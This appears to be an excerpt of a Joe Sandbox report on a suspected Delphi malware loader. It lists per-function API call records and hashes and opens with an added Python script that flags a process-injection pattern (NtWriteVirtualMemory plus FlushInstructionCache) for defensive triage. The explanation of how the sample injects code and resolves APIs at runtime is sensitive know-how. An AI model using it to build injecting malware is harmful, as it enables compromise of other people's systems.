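The record above is the shape of a write-code-into-a-process primitive: module handles and export addresses are resolved at runtime (GetModuleHandleA/W, GetProcAddress), the target memory is written with NtWriteVirtualMemory called straight from NTDLL rather than through the kernel32 WriteProcessMemory wrapper, and FlushInstructionCache is called so the freshly written bytes execute. The following Python is an added example and is not Joe Sandbox code or part of this report: it parses API lines in exactly the layout printed here, rebuilds the report's "API ID" similarity key, and raises a few triage flags so that functions with this call pattern can be pulled out of a large report or clustered across reports. The normalisation used for the API ID (drop the words Get, Nt, Reg, Sys, Ex and Key plus every all-caps token, then group APIs by call count and sort the remaining name words) is an assumption inferred from the five API IDs visible on this page; Joe Sandbox does not document the real rule. The sample records are API lines copied from this report with their argument lists shortened.

```python
"""Parse Joe Sandbox per-function API records, rebuild the report's "API ID"
similarity key and raise simple triage flags. Added example, not Joe Sandbox
code; the API ID normalisation is inferred from this page, not documented."""
import re
from collections import Counter, defaultdict

# One API line of a record: optional bullet, optional "Part of subcall function
# XXXX:", then Api.MODULE(args), ref: ADDRESS  (layout as printed in the report)
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
CAMEL = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z0-9]*")  # CamelCase -> words
# ASSUMPTION: the key drops these prefix/suffix words and every all-caps token
# (A/W suffixes, CLSID, ID). This reproduces the five API IDs on this page.
STOP = {"Get", "Nt", "Reg", "Sys", "Ex", "Key"}

# Constructed input: API lines copied from the report, argument lists shortened
RECORD_INJECT = r"""
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,ntdll), ref: 02B2820A
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000), ref: 02B282C1
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
  • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32), ref: 02B283A4
• FreeLibrary.KERNEL32(742B0000,00000000,Function_0000662C,00000004), ref: 02B28AAA
"""
RECORD_LOCALES = r"""
• GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B15886
  • Part of subcall function 02B15ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02B15AE8
  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019), ref: 02B15B06
  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15B24
  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019), ref: 02B15B42
  • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 02B15B8B
  • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?), ref: 02B15BA9
  • Part of subcall function 02B15ACC: RegCloseKey.ADVAPI32(?,02B15BD8), ref: 02B15BCB
"""
RECORD_PROGID = r"""
• CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9), ref: 02B26D99
  • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
"""


def parse_api_lines(text):
    """Return one dict per API line; non-API lines (headers, hashes) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        calls.append({
            "api": m["api"],
            "module": m["mod"].upper(),
            "args": m["args"].split(",") if m["args"] else [],
            "ref": int(m["ref"], 16),                       # call-site address
            "subcall": int(m["sub"], 16) if m["sub"] else None,  # callee, if nested
        })
    return calls


def api_words(api_name):
    """'GetModuleHandleA' -> ['Module', 'Handle']; 'CLSIDFromProgID' -> ['From', 'Prog']."""
    return [w for w in CAMEL.findall(api_name) if not w.isupper() and w not in STOP]


def api_id(calls):
    """Rebuild the 'API ID' key: APIs grouped by how often they are called (most
    frequent group first, groups joined with '$'), each group being the sorted
    set of the words left in its API names. A/W variants merge into one API."""
    counts = Counter(tuple(api_words(c["api"])) for c in calls)
    by_count = defaultdict(set)
    for words, n in counts.items():
        by_count[n].update(words)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def triage_flags(calls):
    """Cheap per-function indicators an analyst wants surfaced first."""
    apis = {c["api"] for c in calls}
    flags = []
    if apis & {"NtWriteVirtualMemory", "WriteProcessMemory"} and "FlushInstructionCache" in apis:
        flags.append("write-then-flush: code is written into a process and made executable")
    if any(c["api"].startswith("Nt") and c["module"] == "NTDLL" for c in calls):
        flags.append("direct ntdll Nt* call instead of the kernel32 wrapper")
    if "GetProcAddress" in apis and any(a.startswith("GetModuleHandle") for a in apis):
        flags.append("runtime import resolution (GetModuleHandle + GetProcAddress)")
    return flags


if __name__ == "__main__":
    for name, rec in (("inject", RECORD_INJECT), ("locales", RECORD_LOCALES), ("progid", RECORD_PROGID)):
        calls = parse_api_lines(rec)
        print(f"{name}: {len(calls)} calls, API ID {api_id(calls)}, flags {triage_flags(calls)}")
```

Run against the three sample records, the rebuilt keys are the same values the report prints for those functions, and only the injection-style record raises flags; the Borland\Locales lookups are ordinary Delphi runtime locale handling and come out clean. Because the API ID key ignores call-site addresses and arguments, it is the value to pivot on when hunting the same function in other reports, whereas the ref addresses are specific to this process image at base 02B10000.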

APIs
• LoadStringA.USER32(00000000,00010000,?,00001000), ref: 02B16382
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
• Opcode ID: 15b53e0d5145ed84fd5c7cafbd31ebd2320449e067a6ebeb3fc1f24139cbf607
• Instruction ID: f732f31b1b6e725ca1a9caa1cd9428848e30afcf4ad28c3bee2a056935fccc7b
• Opcode Fuzzy Hash: 15b53e0d5145ed84fd5c7cafbd31ebd2320449e067a6ebeb3fc1f24139cbf607
• Instruction Fuzzy Hash: CDF039717006109BDB11EA9CD8C0B9A73DD9F48355B84C1E1BA98CB359DBA0EC558FA2

APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
  • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
• Opcode ID: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
• Instruction ID: 4a4b92f9f1f1dedc7eb8ea25957ab6f61ee95683d80a25ff4dff7ca629b22b25
• Opcode Fuzzy Hash: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
• Instruction Fuzzy Hash: 4CE0ED7520031CBBE711EB62DC42D8E7BBDDB8A750B9104F1F804A3610EA31AE048860

APIs
• GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B15886
  • Part of subcall function 02B15ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
  • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
  • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
  • Part of subcall function 02B15ACC: RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction ID: 7c9d9dffa2493a11e4723fb4feeb4da078b4d5d2d69a9d08b4af680170e4844a
• Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction Fuzzy Hash: EBE09271A003148FCB20DE9CC8C0B4633D8AF48750F840AA1ED68CF346D7B0D9608BD0

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B17DF4
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction ID: d311b245ac91300b6e3f49358a685782d7e933ed16b4da00ed8024326a8731f9
• Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction Fuzzy Hash: 16D05BB63091507AE224965A5D44EA75BDCCFC6770F50067DF558C7180D7208C01C671

APIs
• GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                          • Instruction ID: 632a84800eedb7547e335e22df8e8bc69168021fc75e2a83c2b73d2cf3e45fdf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DC08CF32112010E1E60A9BC1CC425963CD8B842347E01EE1E438CB2C9DB1698663820
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                          • Instruction ID: d7cffd8e024f7b8f43385001079872a4dbc1099a3c00f1deb60213e392578619
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16C08CE22012000A5A5069BC2CC428952CE8B042383F40AE1A438C72E6DB2298A63850
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                                                          • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                          • Instruction ID: b8adcb66bebd1b3e48b5fa80b4c996f08707cfa31f9fb7caba0fef6273ec1ac8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55C012A26102305BEB219AA9ACC0B5262ECDB093A9B9800E1A908DB254E36498008AA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,02B3C350,00000000,00000001), ref: 02B3C36C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Eventtime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2982266575-0
                                                                                                                                                                                                                          • Opcode ID: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                                                                                                                          • Instruction ID: 39911893dd863e4479374ed1cf27a7928856dffec38f1e797a8c7f914e773a37
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC092F27D03003AFA1196A55CC2F732A9DD705B14F608592B704FE2C1D2F36C104E68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B14C3F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                                                                          • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                          • Instruction ID: 80e7b4fa2771d971173456c0e5e36c09b9ea44270529d425196c900267da826c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDB0127421C24116FE5C22620F00773009C8B41386FC800D19F18C80D0FB04C0018835
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B14C57
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction ID: 7fab6391d8bb3388698cf6e1a0aeee282a6f682a804cd6c57ff98dd133c6f0ed
• Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction Fuzzy Hash: A1A011A82002020A8A0A222C002002A2232AFC23003C8C0E80A000A0008A2A8000A8A0

APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B11A03,?,02B12000), ref: 02B115E2
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
• Instruction ID: 03fe3878f1d59a8ade3a4162fc87491624ccb50e7479ac0ca99848020e6f1941
• Opcode Fuzzy Hash: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
• Instruction Fuzzy Hash: AEF04FF0B513004FDB09CFB99A503017BF2E78A388F508579D609DB384E77684028B00

APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B12000), ref: 02B116A4
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
• Instruction ID: 2fea4167986781ebe706da96ff5ffa9d6f742aa5bbf9454daf73e14205420667
• Opcode Fuzzy Hash: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
• Instruction Fuzzy Hash: E2F0BEB2B407956BDB109F6E9C80B82BB98FB003A4F454179FA4CDB340D776A8108BD4

APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B11FE4), ref: 02B11704
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
• Instruction ID: 86618f5e5291e47f99156ca1a41058ff12f6aa9fbee49080096b6405d6bf4e10
• Opcode Fuzzy Hash: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
• Instruction Fuzzy Hash: C5E0C2B5320301AFEB105F7E5D80B12BBDCEF48664FA444BAF749DB381D2A0E8108B64

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B2ADA3,?,?,02B2AE35,00000000,02B2AF11), ref: 02B2AB30
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B2AB48
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B2AB5A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B2AB6C
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B2AB7E
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B2AB90
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B2ABA2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B2ABB4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B2ABC6
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B2ABD8
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B2ABEA
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B2ABFC
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B2AC0E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B2AC20
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B2AC32
